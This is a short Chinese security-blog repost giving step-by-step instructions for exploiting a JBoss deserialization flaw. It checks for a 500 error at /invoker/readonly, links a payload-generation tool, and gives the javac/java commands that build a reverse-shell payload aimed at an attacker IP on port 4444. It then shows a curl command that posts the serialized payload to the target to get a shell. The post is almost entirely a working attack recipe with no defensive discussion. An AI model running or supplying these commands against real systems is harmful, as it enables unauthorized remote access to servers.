【Tips+1】从JBoss反序列化到GetShell

admin 2023年11月3日02:21:08评论43 views字数 514阅读1分42秒阅读模式
【Tips+1】从JBoss反序列化到GetShell

Tips +1

【Tips+1】从JBoss反序列化到GetShell

【Tips+1】从JBoss反序列化到GetShell

通过信息收集发现存在Jboss,访问http://xxxx/invoker/readonly若显示状态码为500的报错界,则证明漏洞是存在的

【Tips+1】从JBoss反序列化到GetShell

使用工具利用漏洞::http://scan.javasec.cn/java/JavaDeserH2HC.zip

执行命令:javac -cp .:commons-collections-3.2.1.jar
ReverseShellCommonsCollectionsHashMap.java

继续执行命令:java -cp .:commons-collections-3.2.1.jar
ReverseShellCommonsCollectionsHashMap ip:4444
IP是攻击机ip,4444

要监听的端口)

【Tips+1】从JBoss反序列化到GetShell

VPS监听端口后,执行如下命令,反弹shell
curl http://www.xxxx.net/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

【Tips+1】从JBoss反序列化到GetShell

End

“点赞、在看与分享都是莫大的支持”

【Tips+1】从JBoss反序列化到GetShell

原文始发于微信公众号(贝雷帽SEC):【Tips+1】从JBoss反序列化到GetShell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月3日02:21:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Tips+1】从JBoss反序列化到GetShellhttps://cn-sec.com/archives/2170988.html

发表评论

匿名网友 填写信息